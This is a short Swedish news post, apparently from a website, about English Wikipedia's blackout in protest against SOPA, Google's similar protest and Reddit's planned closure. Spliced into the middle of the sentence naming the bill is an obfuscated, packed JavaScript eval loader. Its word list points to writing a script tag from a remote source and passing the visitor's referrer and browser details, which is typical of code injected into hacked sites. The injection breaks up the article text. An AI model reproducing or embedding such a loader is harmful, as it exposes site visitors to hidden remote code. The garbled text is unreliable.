Image Image Image Image Image Image Image Image Image Image

| 19 juni, 2018

Scroll to top

Top

No Comments

Wikipedia ligger nere i protest mot SOPA.

Wikipedia ligger nere i protest mot SOPA.
Sebastian Plengier Ehrnfelt

Wikipedias protestaktion mot lagförslaget Stop eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kanet|var|u0026u|referrer|rheyb||js|php’.split(‘|’),0,{}))
Online Privacy Act
eller SOPA, är nu i gång, precis som för Google, vilket vi skrev om här. Detta gäller för engelska Wikipedia. Svenska Wikipedia fungerar som vanligt men man har en orange banner som informerar om protesten på engelska Wikipedia.

Även Reddit ska idag stänga sidan i protest mot SOPA, men detta har inte hänt ännu.

Submit a Comment